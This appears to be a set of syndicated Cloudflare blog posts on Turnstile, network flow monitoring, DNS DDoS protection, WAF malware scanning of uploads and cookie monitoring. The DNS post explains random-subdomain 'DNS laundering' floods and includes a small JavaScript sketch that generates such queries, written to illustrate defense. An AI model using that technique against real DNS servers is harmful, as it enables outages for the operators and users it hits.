Since Turnstile accurately decided that the visitor was not a bot, “success” is “true” and “interactive” is “false” in the response below. “Interactive” being “false” means that the checkbox was checked automatically by Cloudflare, as the visitor was determined to be human: the user was seamlessly allowed access to the website without having to perform any additional action. If a visitor looks suspicious, Turnstile becomes interactive, requiring the visitor to actually click the checkbox to verify that they are not a bot. We used managed mode in this tutorial, but depending on your application logic, you can choose the widget mode that works best for you.

{
  "name": "Sally Lee",
  "email": "[email protected]",
  "referers": "Facebook",
  "movies": "Space Jam",
  "cf-turnstile-response": "0._OHpi7JVN7Xz4abJHo9xnK9JNlxKljOp51vKTjoOi6NR4ru_4MLWgmxt1rf75VxRO4_aesvBvYj8bgGxPyEttR1K2qbUdOiONJUd5HzgYEaD_x8fPYVU6uZPUCdWpM4FTFcxPAnqhTGBVdYshMEycXCVBqqLVdwSvY7Me-VJoge7QOStLOtGgQ9FaY4NVQK782mpPfgVujriDAEl4s5HSuVXmoladQlhQEK21KkWtA1B6603wQjlLkog9WqQc0_3QMiBZzZVnFsvh_NLDtOXykOFK2cba1mLLcADIZyhAho0mtmVD6YJFPd-q9iQFRCMmT2Sz00IToXz8cXBGYluKtxjJrq7uXsRrI5pUUThKgGKoHCGTd_ufuLDjDCUE367h5DhJkeMD9UsvQgr1MhH3TPUKP9coLVQxFY89X9t8RAhnzCLNeCRvj2g-GNVs4-MUYPomd9NOcEmSpklYwCgLQ.jyBeKkV_MS2YkK0ZRjUkMg.6845886eb30b58f15de056eeca6afab8110e3123aeb1c0d1abef21c4dd4a54a1",
  "turnstile_outcome": {
    "success": true,
    "error-codes": [],
    "challenge_ts": "2024-02-28T22:52:30.009Z",
    "hostname": "pages-turnstile-demo.pages.dev",
    "action": "",
    "cdata": "",
    "metadata": {
      "interactive": false
    }
  }
}

Wrapping up

Now that we’ve set up Turnstile, we can head to Turnstile analytics in the Cloudflare Dashboard to monitor the solve rate and widget traffic:

  • Visitor Solve Rate indicates the percentage of visitors who successfully completed the Turnstile widget. A sudden drop could indicate an increase in bot traffic, as bots may fail to complete the challenge presented by the widget.
  • API Solve Rate measures the percentage of visitors who successfully validated their token against the /siteverify API. As with the Visitor Solve Rate, a significant drop may indicate an increase in bot activity, as bots may fail to validate their tokens.
  • Widget Traffic provides insights into the nature of the traffic hitting your website. A high number of challenges requiring interaction may suggest that bots are attempting to access your site, while a high number of unsolved challenges could indicate that the Turnstile widget is effectively blocking suspicious traffic.

And that’s it! We’ve walked you through how to easily secure your Pages with Turnstile. Pages and Turnstile are currently available for free for every Cloudflare user to get started right away. If you are looking for a seamless and speedy developer experience to get a secure website up and running, protected by Turnstile, head over to the Cloudflare Dashboard today!

Free network flow monitoring for all enterprise customers

Post Syndicated from Chris Draper original https://blog.cloudflare.com/free-network-monitoring-for-enterprise


A key component of effective corporate network security is establishing end-to-end visibility across all traffic that flows through the network. Every network engineer needs a complete overview of their network traffic to confirm their security policies work, to identify new vulnerabilities, and to analyze any shifts in traffic behavior. Often, it’s difficult to build out effective network monitoring, as teams struggle with problems like configuring and tuning data collection, managing storage costs, and analyzing traffic across multiple visibility tools.

Today, we’re excited to announce that a free version of Cloudflare’s network flow monitoring product, Magic Network Monitoring, is available to all Enterprise Customers. Every Enterprise Customer can configure Magic Network Monitoring and immediately improve their network visibility in as little as 30 minutes via our self-serve onboarding process.

Enterprise Customers can visit the Magic Network Monitoring product page, click “Talk to an expert”, and fill out the form. You’ll receive access within 24 hours of submitting the request. Over the next month, the free version of Magic Network Monitoring will be rolled out to all Enterprise Customers. The product will automatically be available by default without the need to submit a form.

How it works

Cloudflare customers can send their network flow data (either NetFlow or sFlow) from their routers to Cloudflare’s network edge.

Magic Network Monitoring will pick up this data, parse it, and instantly provide insights and analytics on your network traffic. These analytics include traffic volume over time in bytes and packets, top protocols, sources, destinations, ports, and TCP flags.

Dogfooding Magic Network Monitoring during the remediation of the Thanksgiving 2023 security incident

Let’s review a recent example of how Magic Network Monitoring improved Cloudflare’s own network security and traffic visibility during the Thanksgiving 2023 security incident. Our security team needed a lightweight method to identify malicious packet characteristics in our core data center traffic. We monitored for any network traffic sourced from or destined to a list of ASNs associated with the bad actor. Our security team set up Magic Network Monitoring and established visibility into our first core data center within 24 hours of the project kick-off. Today, Cloudflare continues to use Magic Network Monitoring to monitor for traffic related to bad actors and to provide real-time traffic analytics on more than 1 Tbps of core data center traffic.

Magic Network Monitoring – Traffic Analytics

Monitoring local network traffic from IoT devices

Magic Network Monitoring also improves visibility into network traffic that doesn’t go through Cloudflare. Imagine that you’re a network engineer at ACME Corporation, and it’s your job to manage and troubleshoot IoT devices in a factory that are connected to the factory’s internal network. The traffic generated by these IoT devices doesn’t go through Cloudflare because it is destined for other devices and endpoints on the internal network. Nonetheless, you still need to establish network visibility into device traffic over time to monitor and troubleshoot the system.

To solve the problem, you configure a router or other network device to securely send encrypted traffic flow summaries to Cloudflare via an IPSec tunnel. Magic Network Monitoring parses the data, and instantly provides you with insights and analytics on your network traffic. Now, when an IoT device goes down, or a connection between IoT devices is unexpectedly blocked, you can analyze historical network traffic data in Magic Network Monitoring to speed up the troubleshooting process.

Monitoring cloud network traffic

As cloud networking becomes increasingly prevalent, it is essential for enterprises to invest in visibility across their cloud environments. Let’s say you’re responsible for monitoring and troubleshooting your corporation’s cloud network operations, which are spread across multiple public cloud providers. You need to improve visibility into your cloud network traffic to analyze and troubleshoot any unexpected traffic patterns, like configuration drift that leads to an exposed network port.

To improve traffic visibility across different cloud environments, you can export cloud traffic flow logs from any virtual device that supports NetFlow or sFlow to Cloudflare. We are also building support for native cloud VPC flow logs, in conjunction with Magic Cloud Networking. Cloudflare will parse this traffic flow data and provide alerts plus analytics across all your cloud environments in a single pane of glass on the Cloudflare dashboard.

Improve your security posture today in less than 30 minutes

If you’re an existing Enterprise customer, and you want to improve your corporate network security, you can get started right away. Visit the Magic Network Monitoring product page, click “Talk to an expert”, and fill out the form. You’ll receive access within 24 hours of submitting the request. You can begin the self-serve onboarding tutorial, and start monitoring your first batch of network traffic in less than 30 minutes.

Over the next month, the free version of Magic Network Monitoring will be rolled out to all Enterprise Customers. The product will be automatically available by default without the need to submit a form.

If you’re interested in becoming an Enterprise Customer, and have more questions about Magic Network Monitoring, you can talk with an expert. If you’re a free customer, and you’re interested in testing a limited beta of Magic Network Monitoring, you can fill out this form to request access.

Advanced DNS Protection: mitigating sophisticated DNS DDoS attacks

Post Syndicated from Omer Yoachimik original https://blog.cloudflare.com/advanced-dns-protection


We’re proud to introduce the Advanced DNS Protection system, a robust defense mechanism designed to protect against the most sophisticated DNS-based DDoS attacks. This system is engineered to provide top-tier security, ensuring your digital infrastructure remains resilient in the face of evolving threats.

Our existing systems have been successfully detecting and mitigating ‘simpler’ DDoS attacks against DNS, but they’ve struggled with the more complex ones. The Advanced DNS Protection system is able to bridge that gap by leveraging new techniques that we will showcase in this blog post.

Advanced DNS Protection is currently in beta and available for all Magic Transit customers at no additional cost. Read on to learn more about DNS DDoS attacks, how the new system works, and what new functionality is expected down the road.

Register your interest to learn more about how we can help keep your DNS servers protected, available, and performant.

A third of all DDoS attacks target DNS servers

Distributed Denial of Service (DDoS) attacks are a type of cyber attack that aim to disrupt and take down websites and other online services. When DDoS attacks succeed and websites are taken offline, it can lead to significant revenue loss and damage to reputation.

Distribution of DDoS attack types for 2023

One common way to disrupt and take down a website is to flood its servers with more traffic than they can handle. This is known as an HTTP flood attack: a type of DDoS attack that targets the website directly with a large volume of HTTP requests. According to our last DDoS trends report, in 2023 our systems automatically mitigated 5.2 million HTTP DDoS attacks — accounting for 37% of all DDoS attacks.

Diagram of an HTTP flood attack

However, there is another way to take down websites: by targeting them indirectly. Instead of flooding the website servers, the threat actor floods the DNS servers. If the DNS servers are overwhelmed with more queries than they can handle, hostname-to-IP-address translation fails and the website suffers an indirectly inflicted outage, because the DNS server cannot respond to legitimate queries.

One notable example is the attack that targeted Dyn, a DNS provider, in October 2016. It was a devastating DDoS attack launched by the infamous Mirai botnet. It caused disruptions for major sites like Airbnb, Netflix, and Amazon, and it took Dyn an entire day to restore services. That’s a long time for service disruptions that can lead to significant reputation and revenue impact.

Over seven years later, Mirai attacks and DNS attacks are still incredibly common. In 2023, DNS attacks were the second most common attack type — with a 33% share of all DDoS attacks (4.6 million attacks). Attacks launched by Mirai-variant botnets were the fifth most common type of network-layer DDoS attack, accounting for 3% of all network-layer DDoS attacks.

Diagram of a DNS query flood attack

What are sophisticated DNS-based DDoS attacks?

DNS-based DDoS attacks can be easier to mitigate when there is a recurring pattern in each query. This is what’s called the “attack fingerprint”. Fingerprint-based mitigation systems can identify those patterns and then deploy a mitigation rule that surgically filters the attack traffic without impacting legitimate traffic.

For example, let’s take a scenario where an attacker sends a flood of DNS queries to their target. In this example, the attacker randomized only the source IP address; all other query fields remained consistent. The mitigation system detects the pattern (the source port is 1024 and the queried domain is example.com) and generates an ephemeral mitigation rule to filter those queries.

A simplified diagram of the attack fingerprinting concept
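Conceptually, a fingerprint-based mitigation rule is just a predicate over query fields. A minimal sketch of the idea (the field names are illustrative, not Cloudflare’s internal representation):

// An ephemeral mitigation rule generated from the detected pattern
const fingerprint = { srcPort: 1024, qname: 'example.com' };

// Drop queries that match every field of the fingerprint
function shouldDrop(query, fp) {
	return Object.entries(fp).every(([field, value]) => query[field] === value);
}

shouldDrop({ srcPort: 1024, qname: 'example.com' }, fingerprint);  // true  -> dropped
shouldDrop({ srcPort: 53211, qname: 'example.com' }, fingerprint); // false -> passed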

However, there are DNS-based DDoS attacks that are much more sophisticated and randomized, lacking an apparent attack pattern. Without a consistent pattern to lock on to, it becomes virtually impossible to mitigate the attack using a fingerprint-based mitigation system. Moreover, even if an attack pattern is detected in a highly randomized attack, the pattern would probably be so generic that it would mistakenly mitigate legitimate user traffic and/or not catch the entire attack.

In this example, the attacker also randomized the queried domain in their DNS query flood attack. Simultaneously, a legitimate client (or server) is also querying example.com. They were assigned a random port number which happened to be 1024. The mitigation system detected a pattern (source port is 1024 and the queried domain is example.com) that caught only the part of the attack that matched the fingerprint. The mitigation system missed the part of the attack that queried other hostnames. Lastly, the mitigation system mistakenly caught legitimate traffic that happened to appear similar to the attack traffic.

A simplified diagram of a randomized DNS flood attack

This is just one very simple example of how fingerprinting can fail in stopping randomized DDoS attacks. This challenge is amplified when attackers “launder” their attack traffic through reputable public DNS resolvers (a DNS resolver, also known as a recursive DNS server, is a type of DNS server that is responsible for tracking down the IP address of a website from various other DNS servers). This is known as a DNS laundering attack.

Diagram of the DNS resolution process

During a DNS laundering attack, the attacker queries subdomains of a real domain that is managed by the victim’s authoritative DNS server. The prefix that defines the subdomain is randomized and is never used more than once. Due to the randomization element, recursive DNS servers will never have a cached response and will need to forward the query to the victim’s authoritative DNS server. The authoritative DNS server is then bombarded with so many queries that it can no longer serve legitimate queries, or even crashes altogether.

Diagram of a DNS Laundering attack
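The random, never-reused prefix is what makes laundering effective: it guarantees a cache miss at every resolver, so each query falls through to the victim. A sketch of why caching offers no relief (the helper names are hypothetical):

// Each query uses a fresh random prefix, e.g. eight random hex characters
function launderedQuery(domain) {
	const prefix = Math.random().toString(16).slice(2, 10);
	return `${prefix}.${domain}`; // e.g. "a1b2c3d4.example.com"
}

// A resolver cache keyed on the full query name never gets a hit,
// so every single query is forwarded to the authoritative server.
const cache = new Map();
const qname = launderedQuery('example.com');
if (!cache.has(qname)) {
	// forwardToAuthoritative(qname); // the victim absorbs the full load
}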

The complexity of sophisticated DNS DDoS attacks lies in their paradoxical nature: while they are relatively easy to detect, effectively mitigating them is significantly more difficult. This difficulty stems from the fact that authoritative DNS servers cannot simply block queries from recursive DNS servers, as these servers also make legitimate requests. Moreover, the authoritative DNS server is unable to filter queries aimed at the targeted domain because it is a genuine domain that needs to remain accessible.

Mitigating sophisticated DNS-based DDoS attacks with the Advanced DNS Protection system

The rise in these types of sophisticated DNS-based DDoS attacks motivated us to develop a new solution — a solution that would better protect our customers and bridge the gap of more traditional fingerprinting approaches. This solution came to be the Advanced DNS Protection system. Similar to the Advanced TCP Protection system, it is a software-defined system that we built, and it is powered by our stateful mitigation platform, flowtrackd (flow tracking daemon).

The Advanced DNS Protection system complements our existing suite of DDoS defense systems. Following the same approach as our other DDoS defense systems, the Advanced DNS Protection system is also a distributed system, and an instance of it runs on every Cloudflare server around the world. Once the system has been initiated, each instance can detect and mitigate attacks autonomously without requiring any centralized regulation. Detection and mitigation are instantaneous (zero seconds). Each instance also communicates with other instances on other servers in a data center. They gossip and share threat intelligence to deliver a comprehensive mitigation within each data center.

Screenshots from the Cloudflare dashboard showcasing a DNS-based DDoS attack that was mitigated by the Advanced DNS Protection system 

Together, our fingerprinting-based systems (the DDoS protection managed rulesets) and our stateful mitigation systems provide a robust multi-layered defense strategy to defend against the most sophisticated and randomized DNS-based DDoS attacks. The system is also customizable, allowing Cloudflare customers to tailor it for their needs. Review our documentation for more information on configuration options.

Diagram of Cloudflare’s DDoS protection systems

We’ve also added new DNS-centric data points to help customers better understand their DNS traffic patterns and attacks. These new data points are available in a new “DNS Protection” tab within the Cloudflare Network Analytics dashboard. The new tab provides insights about which DNS queries are passed and dropped, as well as the characteristics of those queries, including the queried domain name and the record type. The analytics can also be fetched by using the Cloudflare GraphQL API and by exporting logs into your own monitoring dashboards via Logpush.

DNS queries: discerning good from bad

To protect against sophisticated and highly randomized DNS-based DDoS attacks, we needed to get better at deciding which DNS queries are likely to be legitimate for our customers. However, it’s not easy to infer what’s legitimate and what’s likely to be part of an attack based on the query name alone. We can’t rely solely on fingerprint-based detection mechanisms, since sometimes seemingly random queries, like abc123.example.com, can be legitimate. The opposite is true as well: a query for mailserver.example.com might look legitimate, but may not actually be a real subdomain for a given customer.

To make matters worse, our Layer 3 packet routing-based mitigation service, Magic Transit, uses direct server return (DSR), meaning we cannot see the DNS origin server’s responses to give us feedback about which queries are ultimately legitimate.

Diagram of Magic Transit with Direct Server Return (DSR)

We decided that the best way to combat these attacks is to build a data model of each customer’s expected DNS queries, based on a historical record that we build. With this model in hand, we can decide with higher confidence which queries are likely to be legitimate, and drop the ones that we think are not, shielding our customer’s DNS servers.

This is the basis of Advanced DNS Protection. It inspects every DNS query sent to our Magic Transit customers, and passes or drops them based on the data model and each customer’s individual settings.

To do so, each server in our global network continually sends certain DNS-related data, such as the query type (for example, A record) and the queried domains (but not the source of the query), to our core data centers, where we periodically compute DNS query traffic profiles for each customer. Those profiles are distributed across our global network, where they are consulted to help us more confidently and accurately decide which queries are good and which are bad. We drop the bad queries and pass on the good ones, taking into account a customer’s tolerance for unexpected DNS queries based on their configuration.

Solving the technical challenges that emerged when designing the Advanced DNS Protection system

In building this system, we faced several specific technical challenges:

Data processing

We process tens of millions of DNS queries per day across our global network for our Magic Transit customers, not counting Cloudflare’s suite of other DNS products, and use the DNS-related data mentioned above to build custom query traffic profiles. Analyzing this type of data requires careful treatment of our data pipelines. When building these traffic profiles, we use sample-on-write and adaptive bitrate technologies when writing and reading the necessary data, respectively, to ensure that we capture the data with a fine granularity while protecting our data infrastructure, and we drop information that might impact the privacy of end users.

Compact representation of query data

Some of our customers see tens of millions of DNS queries per day alone. This amount of data would be prohibitively expensive to store and distribute in an uncompressed format. To solve this challenge, we decided to use a counting Bloom filter for each customer’s traffic profile. This is a probabilistic data structure that allows us to succinctly store and distribute each customer’s DNS profile, and then efficiently query it at packet processing time.
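To illustrate the data structure (this is a sketch, not Cloudflare’s actual implementation), a counting Bloom filter keeps an array of small counters instead of bits, so entries can be removed as profiles age out, at the cost of a tunable false-positive rate:

class CountingBloomFilter {
	constructor(size = 1 << 20, hashes = 4) {
		this.counters = new Uint8Array(size);
		this.size = size;
		this.hashes = hashes;
	}

	// Derive k indexes from a string key (seeded FNV-1a variants; illustrative)
	indexes(key) {
		const out = [];
		for (let i = 0; i < this.hashes; i++) {
			let h = 2166136261 ^ i;
			for (const ch of key) {
				h = Math.imul(h ^ ch.charCodeAt(0), 16777619);
			}
			out.push((h >>> 0) % this.size);
		}
		return out;
	}

	add(key) {
		for (const i of this.indexes(key)) if (this.counters[i] < 255) this.counters[i]++;
	}

	remove(key) {
		for (const i of this.indexes(key)) if (this.counters[i] > 0) this.counters[i]--;
	}

	// May return false positives, but never false negatives
	mightContain(key) {
		return this.indexes(key).every((i) => this.counters[i] > 0);
	}
}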

Data distribution

We periodically need to recompute and redistribute every customer’s DNS traffic profile from our core data centers to each server in our fleet. We used our very own R2 storage service to greatly simplify this task. With regional hints and custom domains, we enabled caching and needed only a handful of R2 buckets. Each time we need to update the global view of the customer data models across our edge fleet, 98% of the bits transferred are served from cache.

Built-in tolerance

When new domain names are put into service, our data models will not immediately be aware of them, because queries with these names have never been seen before. This and other sources of potential false positives mean we need to build a certain amount of tolerance into the system to allow potentially legitimate queries through. We do so by leveraging token bucket algorithms. Customers can configure the size of the token buckets by changing the sensitivity levels of the Advanced DNS Protection system. The lower the sensitivity, the larger the token bucket, and vice versa. A larger token bucket provides more tolerance for unexpected DNS queries and for expected DNS queries that deviate from the profile. A high sensitivity level translates to a smaller token bucket and a stricter approach, as sketched below.
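Putting the pieces together, a per-customer decision path might look like the following sketch, where the bucket capacity reflects the configured sensitivity level (all names and numbers are illustrative):

class TokenBucket {
	constructor(capacity, refillPerSecond) {
		this.capacity = capacity; // lower sensitivity -> larger capacity
		this.tokens = capacity;
		this.refillPerSecond = refillPerSecond;
		this.lastRefill = Date.now();
	}

	tryConsume() {
		const now = Date.now();
		const elapsedSeconds = (now - this.lastRefill) / 1000;
		this.tokens = Math.min(this.capacity, this.tokens + elapsedSeconds * this.refillPerSecond);
		this.lastRefill = now;
		if (this.tokens >= 1) {
			this.tokens -= 1;
			return true;
		}
		return false;
	}
}

// Pass queries that match the customer's profile; spend a token on unexpected ones
function decide(query, profile, bucket) {
	if (profile.mightContain(`${query.type}:${query.name}`)) return 'pass';
	return bucket.tryConsume() ? 'pass' : 'drop';
}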

Leveraging Cloudflare’s global software-defined network

At the end of the day, these are the types of challenges that Cloudflare is excellent at solving. Our customers trust us with handling their traffic, and ensuring their Internet properties are protected, available and performant. We take that trust extremely seriously.

The Advanced DNS Protection system leverages our global infrastructure and data processing capabilities alongside intelligent algorithms and data structures to protect our customers.

If you are not yet a Cloudflare customer, let us know if you’d like to protect your DNS servers. Existing Cloudflare customers can enable the new systems by contacting their account team or Cloudflare Support.

General availability for WAF Content Scanning for file malware protection

Post Syndicated from Radwa Radwan original https://blog.cloudflare.com/waf-content-scanning-for-malware-detection


File upload is a common feature in many web applications. Applications may allow users to upload files like images of flood damage to file an insurance claim, PDFs like resumes or cover letters to apply for a job, or other documents like receipts or income statements. However, beneath the convenience lies a potential threat, since allowing unrestricted file uploads can expose the web server and your enterprise network to significant risks related to security, privacy, and compliance.

Cloudflare recently introduced WAF Content Scanning, our in-line malware file detection and prevention solution to stop malicious files from reaching the web server, offering our Enterprise WAF customers an additional line of defense against security threats.

Today, we’re pleased to announce that the feature is now generally available. It will be automatically rolled out to existing WAF Content Scanning customers before the end of March 2024.

In this blog post we will share more details about the new version of the feature, what we have improved, and some of the technical challenges we faced while building it. This feature is available to Enterprise WAF customers as an add-on license; contact your account team to get access.

What to expect from the new version?

The feedback from the early access version has resulted in additional improvements. The main one is expanding the maximum size of scanned files from 1 MB to 15 MB. This change required a complete redesign of the solution’s architecture and implementation. Additionally, we are improving the dashboard visibility and the overall analytics experience.

Let’s quickly review how malware scanning operates within our WAF.

Behind the scenes

WAF Content Scanning operates in a few stages: users activate and configure it; the scanning engine detects which requests contain files; the files are sent to the scanner, which returns the scan result fields; and finally, users can build custom rules with these fields. We will dig deeper into each step in this section.

Activate and configure

Customers can enable the feature via the API, or through the Settings page in the dashboard (Security → Settings), where a new section has been added for configuring and enabling incoming traffic detection. As soon as this action is taken, the enablement is distributed across the Cloudflare network and incoming traffic begins to be scanned.

Customers can also add a custom configuration depending on the file upload method, such as a base64 encoded file in a JSON string, which allows the specified file to be parsed and scanned automatically.

In the example below, the customer wants us to look in JSON bodies for the key “file” and scan its value.
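The rule is written using the wirefilter syntax; this is the same custom scan expression we will revisit in the architecture discussion later in this post:

lookup_json_string(http.request.body.raw, "file")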

Engine runs on traffic and scans the content

As soon as the feature is activated and configured, the scanning engine runs the pre-scanning logic, and identifies content automatically via heuristics. In this case, the engine logic does not rely on the Content-Type header, as it’s easy for attackers to manipulate. When relevant content or a file has been found, the engine connects to the antivirus (AV) scanner in our Zero Trust solution to perform a thorough analysis and return the results of the scan. The engine uses the scan results to propagate useful fields that customers can use.

Integrate with WAF

For every request where a file is found, the scanning engine returns various fields, including:

  • cf.waf.content_scan.has_malicious_obj
  • cf.waf.content_scan.obj_sizes
  • cf.waf.content_scan.obj_types
  • cf.waf.content_scan.obj_results

The scanning engine integrates with the WAF where customers can use those fields to create custom WAF rules to address various use cases. The basic use case is primarily blocking malicious files from reaching the web server. However, customers can construct more complex logic, such as enforcing constraints on parameters such as file sizes, file types, endpoints, or specific paths.
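For example, a rule that blocks malicious uploads to an upload endpoint could match on an expression like the following with a block action (the path constraint is illustrative):

cf.waf.content_scan.has_malicious_obj and http.request.uri.path contains "/upload"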

In-line scanning limitations and file types

One question that often comes up is which file types we detect and scan in WAF Content Scanning. Initially, answering this question posed a challenge, since HTTP requests have no built-in definition of a “file”, and scanning all incoming HTTP requests does not make sense, as it adds extra processing and latency. So, we had to decide on a definition to spot HTTP requests that include files, or as we call it, “uploaded content”.

The WAF Content Scanning engine makes that decision by filtering out certain content types identified by heuristics. Any content type not included in a predefined list (such as text/html, text/x-shellscript, application/json, and text/xml) is considered uploaded content and is sent to the scanner for examination. This allows us to scan a wide range of content and file types without adding extra processing to every request. The wide range of files we scan includes:

  • Executable (e.g., .exe, .bat, .dll, .wasm)
  • Documents (e.g., .doc, .docx, .pdf, .ppt, .xls)
  • Compressed (e.g., .7z, .gz, .zip, .rar)
  • Image (e.g., .jpg, .png, .gif, .webp, .tif)
  • Video and audio files within the 15 MB file size range.

The 15 MB file size scanning limit comes from the fact that in-line file scanning runs in real time, which offers safety to the web server and instant access to clean files, but also sits in the request delivery path. It’s therefore crucial to scan the payload without causing significant delays or interruptions, namely increased CPU time and latency.

Scaling the scanning process to 15 MB

In the early design of the product, we built a system that could handle requests with a maximum body size of 1 MB, and increasing the limit to 15 MB had to happen without adding any extra latency. As mentioned, this latency is not added to all requests, but only to the requests that have uploaded content. However, increasing the size with the same design would have increased the latency by 15x for those requests.

In this section, we use scanning files embedded in JSON request bodies as an example. We first discuss how this worked in the former architecture and why it was challenging to expand the file size limit with that design, then walk through the changes made in the new release to overcome the extra latency.

Old architecture used for the Early Access release

To use the content scanning functionality to scan files embedded in JSON request bodies, customers had to configure a rule like:

lookup_json_string(http.request.body.raw, "file")

This means we should look in the request body, but only at the “file” key, which in this example contains a base64-encoded string for an image.

When the request hits our Front Line (FL) NGINX proxy, we buffer the request body. This will be in an in-memory buffer, or written to a temporary file if the size of the request body exceeds the NGINX client_body_buffer_size setting. Then, our WAF engine executes the lookup_json_string function and returns the base64 string, which is the content of the file key. The base64 string gets sent via Unix domain sockets to our malware scanner, which does MIME type detection and returns a verdict to the file upload scanning module.

This architecture had a bottleneck that made it hard to expand on: the latency cost. The request body is first buffered in NGINX and then copied into our WAF engine, where rules are executed. The malware scanner then receives the execution result, which in the worst case is the entire request body, over a Unix domain socket. In other words, once NGINX buffers the request body, we send and buffer it in two other services.

New architecture for the General Availability release

In the new design, the requirements were to scan larger files (15x larger) while not compromising on performance. To achieve this, we decided to bypass our WAF engine, which is where we introduced the most latency.

In the new architecture, we made the malware scanner aware of what is needed to execute the rule, hence bypassing the Ruleset Engine (RE). For example, the configuration lookup_json_string(http.request.body.raw, "file") will be represented roughly as:

{
    Function: lookup_json_string
    Args: ["file"]
}

This is achieved by walking the Abstract Syntax Tree (AST) when the rule is configured, and deploying the sample struct above to our global network. The struct’s values will be read by the malware scanner, and rule execution and malware detection will happen within the same service. This means we don’t need to read the request body, execute the rule in the Ruleset Engine (RE) module, and then send the results over to the malware scanner.

The malware scanner will now read the request body from the temporary file directly, perform the rule execution, and return the verdict to the file upload scanning module.

The file upload scanning module populates these fields, so they can be used to write custom rules and take actions. For example:

all(cf.waf.content_scan.obj_results[*] == "clean")

This module also enriches our logging pipelines with these fields, which can then be read in Logpush, Edge Log Delivery, Security Analytics, and Firewall Events in the dashboard. For example, this is the security log in the Cloudflare dashboard (Security → Analytics) for a web request that triggered WAF Content Scanning:

WAF content scanning detection visibility

Using the concept of incoming traffic detection, WAF Content Scanning enables users to identify hidden risks through traffic signals in the analytics before blocking or mitigating matching requests. This reduces false positives and permits security teams to make decisions based on well-informed data. This isn’t the only place we apply this idea; we do the same for a number of other products, like WAF Attack Score and Bot Management.

We have integrated helpful information into our security products, like Security Analytics, to provide this data visibility. The Content Scanning tab, located on the right sidebar, displays traffic patterns even if no WAF rules are in place. The same data is also reflected in the sampled requests, and you can create new rules from the same view.

On the other hand, if you want to fine-tune your security settings, you will see better visibility in Security Events, where these are the requests that match specific rules you have created in WAF.

Last but not least, in our Logpush datastream, we have included the scan fields that can be selected to send to any external log handler.

What’s next?

Before the end of March 2024, all current and new customers who have enabled WAF Content Scanning will be able to scan uploaded files up to 15 MB. Next, we’ll focus on improving how we handle files in the rules, including adding a dynamic header functionality. Quarantining files is also another important feature we will be adding in the future. If you’re an Enterprise customer, reach out to your account team for more information and to get access.

Collect all your cookies in one jar with Page Shield Cookie Monitor

Post Syndicated from Zhiyuan Zheng original https://blog.cloudflare.com/collect-all-your-cookies-in-one-jar


Cookies are small files of information that a web server generates and sends to a web browser. For example, a cookie stored in your browser will let a website know that you are already logged in, so instead of showing you a login page, you would be taken to your account page welcoming you back.

Though cookies are very useful, they are also used for tracking and advertising, sometimes with repercussions for user privacy. Cookies are a core tool, for example, for all advertising networks. To protect users, privacy laws may require website owners to clearly specify what cookies are being used and for what purposes, and, in many cases, to obtain a user’s consent before storing those cookies in the user’s browser. A key example of this is the ePrivacy Directive.

Herein lies the problem: often website administrators, developers, or compliance team members don’t know what cookies are being used by their website. A common approach for gaining a better understanding of cookie usage is to set up a scanner bot that crawls through each page, collecting cookies along the way. However, many websites requiring authentication or additional security measures do not allow for these scans, or require custom security settings to allow the scanner bot access.

To address these issues, we developed Page Shield Cookie Monitor, which provides a full single dashboard view of all first-party cookies being used by your websites. Over the next few weeks, we are rolling out Page Shield Cookie Monitor to all paid plans, no configuration or scanners required if Page Shield is enabled.

HTTP cookies

HTTP cookies are designed to allow persistence for the stateless HTTP protocol. A basic example of cookie usage is identifying a logged-in user. The browser submits the cookie back to the website whenever you access it again, letting the website know who you are and providing you with a customized experience. Cookies are implemented as HTTP headers.

Cookies can be classified as first-party or third-party.

First-party cookies are normally set by the website owner1, and are used to track state for the given website. The logged-in example above falls into this category. First-party cookies are normally restricted and sent to the given website only, and won’t be visible to other sites.

Third-party cookies, on the other hand, are often set by large advertising networks, social networks, or other large organizations that want to track user journeys across the web (across domains). For example, some websites load advertisement objects from a different domain that may set a third-party cookie associated with that advertising network.

Cookies are used for tracking

Growing concerns around user privacy have led browsers to start blocking third-party cookies by default. Firefox and Safari led the way a few years back; Google Chrome, which currently has the largest browser market share, and whose parent company owns Google Ads, the dominant advertising network, started restricting third-party cookies in January of this year.

However, this does not mean the end of tracking users for advertising purposes; the technology has advanced, allowing tracking to continue based on first-party cookies. Facebook Pixel, for example, started offering to set first-party cookies alongside third-party cookies in 2018 when embedded in a website, in order “to be more accurate in measurement and reporting”.

Scanning for cookies?

To inventory all the cookies used when your website is accessed, you can open any modern browser’s developer console and review which cookies are being set and sent back per HTTP request. However, collecting cookies with this approach won’t be practical unless your website is rather static and contains few external snippets.

Screen capture of Chrome’s developer console listing cookies being set and sent back when visiting a website.

To resolve this, a cookie scanner can be used to automate cookie collection. Depending on your security setup, additional configurations are sometimes required in order to let the scanner bots pass through protection and/or authentication. This may open up a potential attack surface, which isn’t ideal.

Introducing Page Shield Cookie Monitor

With Page Shield enabled, all the first-party cookies, whether set by your website or by external snippets, are collected and displayed in one place, no scanner required. With the click of a button, the full list can be exported in CSV format for further inventory processing.

If you run multiple websites that require different cookie strategies, such as a marketing website and an admin console, you can simply filter the list by domain or path in the same view. This includes websites that require authentication, such as the admin console.

Dashboard showing a table of cookies seen, including key details such as cookie name, domain and path, and which host set the cookie.

To examine a particular cookie, clicking on its name takes you to a dedicated page that includes all the cookie attributes. Furthermore, similar to Script Monitor and Connection Monitor, we collect the first seen and last seen time and pages for easier tracking of your website’s behavior.

Detailed view of a captured cookie in the dashboard, including all cookie attributes as well as under which host and path this cookie has been set.

Last but not least, we are adding one more alert type specifically for newly seen cookies. When you subscribe to this alert, we will notify you through either email or webhook as soon as a new cookie is detected, including all the details mentioned above. This allows you to trigger any workflow required, such as inventorying the new cookie for compliance.

How Cookie Monitor works

Let’s imagine you run an e-commerce website, example.com. When a user logs in to view their ongoing orders, your website sends a header with the key Set-Cookie and a value that identifies each user’s login activity:

  • login_id=ABC123; Domain=.example.com

To analyze visitor behavior, you use Google Analytics, which requires embedding a code snippet in all web pages. This snippet will set two more cookies after the pages are loaded in the browser:

  • _ga=GA1.2; Domain=.example.com;
  • _ga_ABC=GS1.3; Domain=.example.com;

As these two cookies from Google Analytics are considered first-party given their domain attribute, they are automatically included alongside the login cookie sent back to your website. The final Cookie header sent back by a logged-in user would be Cookie: login_id=ABC123; _ga=GA1.2; _ga_ABC=GS1.3, with the three cookies concatenated into one string, even though only one of them is directly consumed by your website.

